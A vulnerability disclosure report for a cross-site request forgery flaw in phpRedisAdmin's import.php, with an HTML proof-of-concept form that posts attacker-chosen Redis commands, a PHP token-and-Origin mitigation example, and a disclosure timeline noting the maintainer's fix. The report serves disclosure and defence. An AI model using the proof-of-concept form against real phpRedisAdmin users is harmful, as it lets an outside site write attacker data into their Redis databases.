Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin

Valid

Reported on

Aug 23rd 2021


✍️ Description

The Import functionality (import.php) accepts state-changing POST requests without any anti-CSRF protection, so a page on a different origin can submit the import form on behalf of a user who is logged in to phpRedisAdmin.

🕵️‍♂️ Proof of Concept

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://domain.tld/phpRedisAdmin/import.php?s=1&d=0" method="POST">
      <input type="hidden" name="commands" value="DATA TO BE IMPORTED HERE" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


💥 Impact

An attacker who gets an authenticated phpRedisAdmin user to open a malicious page can import attacker-chosen data into the Redis database without the user's knowledge or any further interaction.
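A mitigation for this class of bug, as an added example that is not phpRedisAdmin's code and not the fix in b9039a: a synchronizer-token check on the import POST handler, with an Origin-header check and a SameSite session cookie as defence in depth. The function names and the allowed origin https://domain.tld are assumptions.

```php
<?php
// Added example (not phpRedisAdmin's own code): CSRF guard for a POST
// endpoint such as import.php. Function names are hypothetical.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// Issue a per-session CSRF token; call when rendering the import form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Verify a submitted token. hash_equals() compares in constant time.
// The empty-string guard matters: hash_equals('', '') would return true.
function csrf_valid(?string $submitted): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && $submitted !== null && hash_equals($expected, $submitted);
}

// Defence in depth: reject POSTs whose Origin header names another site.
// A missing Origin is tolerated because the token check still applies.
function origin_allowed(string $allowedOrigin): bool {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? null;
    return $origin === null || $origin === $allowedOrigin;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $token = isset($_POST['csrf_token']) && is_string($_POST['csrf_token']) ? $_POST['csrf_token'] : null;
    if (!csrf_valid($token) || !origin_allowed('https://domain.tld')) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // Only now is it safe to process $_POST['commands'] (the import payload).
}
?>
<form method="POST" action="import.php?s=1&amp;d=0">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <textarea name="commands"></textarea>
  <input type="submit" value="Import">
</form>
```

The cross-origin form in the proof of concept above carries no csrf_token field and, in browsers that send it, an Origin of the attacker's site, so it is rejected before the commands parameter is read.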

Occurrences

a year ago: We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back
a year ago: Erik Dubbelboer confirmed that a fix has been merged in b9039a
The fix bounty has been dropped